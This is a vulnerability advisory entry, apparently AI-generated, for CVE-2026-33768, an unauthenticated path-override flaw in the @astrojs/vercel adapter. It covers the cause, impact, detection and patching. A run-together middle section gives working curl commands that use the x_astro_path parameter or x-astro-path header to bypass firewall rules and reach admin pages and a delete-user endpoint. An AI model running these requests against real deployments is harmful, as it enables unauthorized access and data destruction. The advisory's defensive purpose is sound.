
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33768 is an unauthenticated path override vulnerability in the @astrojs/vercel serverless adapter for the Astro web framework. The flaw allows any unauthenticated attacker to rewrite the internal request path processed by the serverless entrypoint by supplying the x-astro-path HTTP header or x_astro_path query parameter, effectively bypassing Vercel's platform-level firewall and path-based access controls. All versions of @astrojs/vercel prior to 10.0.2 are affected (verified against Astro 5.18.1 + @astrojs/vercel 9.0.4 and Astro 6.0.3 + @astrojs/vercel 10.0.0). The vulnerability was published on March 24, 2026, and patched in version 10.0.2 released March 19, 2026. The CVSS v3.1 base score is 6.5 (Moderate) per the GitHub Advisory, though Feedly's NVD data assigns a higher score of 9.1 (Critical) reflecting the full confidentiality and integrity impact (GitHub Advisory, Github Advisory).
The root cause is a missing authorization check (CWE-862) combined with an unintended proxy/confused deputy pattern (CWE-441) in packages/integrations/vercel/src/serverless/entrypoint.ts. The vulnerable code unconditionally reads the x-astro-path header or x_astro_path query parameter and rewrites url.pathname without verifying the trusted middlewareSecret — a check that was already applied to the adjacent x-astro-locals header. The x-astro-path mechanism was designed for internal use by Vercel Edge Middleware (which always overwrites any client-supplied value), but when no Edge Middleware is configured, the serverless function is directly reachable and the override is fully attacker-controlled. Because the rewritten request preserves the original HTTP method and body, all methods (GET, POST, PUT, DELETE) are affected; Vercel's firewall evaluates the original path while the serverless function serves the overridden one (GitHub Advisory, Patch Commit).
An unauthenticated remote attacker can bypass all path-based firewall rules, IP blocks, geo-restrictions, and rate limits configured in Vercel Dashboard or vercel.json, gaining read access to any protected page or API endpoint and write access to any restricted mutation endpoint (POST/PUT/DELETE). This means administrative functions (e.g., user deletion, data modification) that are protected solely by path-based firewall rules are fully reachable. Additionally, Vercel audit logs record the original (spoofed) path rather than the actually-served path, creating an audit log mismatch that makes detection difficult without specific knowledge of the x_astro_path parameter (GitHub Advisory).
A proof-of-concept exploit consisting of concrete curl commands is publicly available in the official GitHub Security Advisory, demonstrating full exploitation against real Astro/Vercel deployments (GitHub Advisory). No privileges, authentication, or user interaction are required; the attack is executable over the network with low complexity. The EPSS score is approximately 0.05% (16th percentile), and there is no evidence of in-the-wild exploitation or threat actor attribution at this time. The vulnerability is not listed in the CISA KEV catalog.
@astrojs/vercel adapter versions prior to 10.0.2 without Edge Middleware configured. Look for publicly accessible Vercel-hosted sites built with Astro (e.g., via response headers or vercel.json artifacts)./public, /api/health) that is not blocked by Vercel's firewall and can serve as the "cover" path for the override./admin/secret, /admin/delete-user) that is blocked by Vercel's firewall or path-based access controls.x_astro_path query parameter set to the restricted path:curl "https://target.vercel.app/public?x_astro_path=/admin/secret"
# Returns: PAGE_ID: admin-secretAlternatively, use the header form:curl -H "x-astro-path: /admin/secret" https://target.vercel.app/publiccurl -X POST -H "Content-Type: application/json" -d '{"userId":"123"}' \
"https://target.vercel.app/api/health?x_astro_path=/admin/delete-user"
# Returns: {"action":"delete-user","status":"deleted","method":"POST"}/public, /api/health) containing the x_astro_path query parameter or x-astro-path header pointing to sensitive paths (e.g., /admin/*); unexpected HTTP methods (POST, PUT, DELETE) to endpoints that normally only receive GET requests.GET /public?x_astro_path=/admin/secret or POST /api/health?x_astro_path=/admin/delete-user — the logged path will be the public endpoint, not the actually-served restricted path; discrepancies between logged paths and actual application behavior.Upgrade @astrojs/vercel to version 10.0.2 or later, which gates path override processing behind the trusted middlewareSecret — the same secret already protecting x-astro-locals (Patch Commit, Release Notes). For deployments unable to patch immediately, implement Vercel Edge Middleware (which always overwrites any client-supplied x-astro-path value with the correct one), or configure reverse proxy/WAF rules to block or strip requests containing the x-astro-path header or x_astro_path query parameter before they reach the serverless function. ISR (Incremental Static Regeneration) deployments are not affected, as Vercel's cache layer intercepts before the function runs (GitHub Advisory).
The vulnerability was reported by security researcher jp-soba and published by Astro maintainer matthewp on March 24, 2026. The advisory explicitly draws a parallel to CVE-2025-29927 (Next.js x-middleware-subrequest header bypass), highlighting this as a recurring class of vulnerability in serverless web framework adapters where internal routing headers are exposed to external callers. The fix was merged on March 19, 2026 (before public disclosure), though it introduced a regression in ISR path rewriting that required a follow-up fix in PR #16079 (GitHub Advisory, Fix PR).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."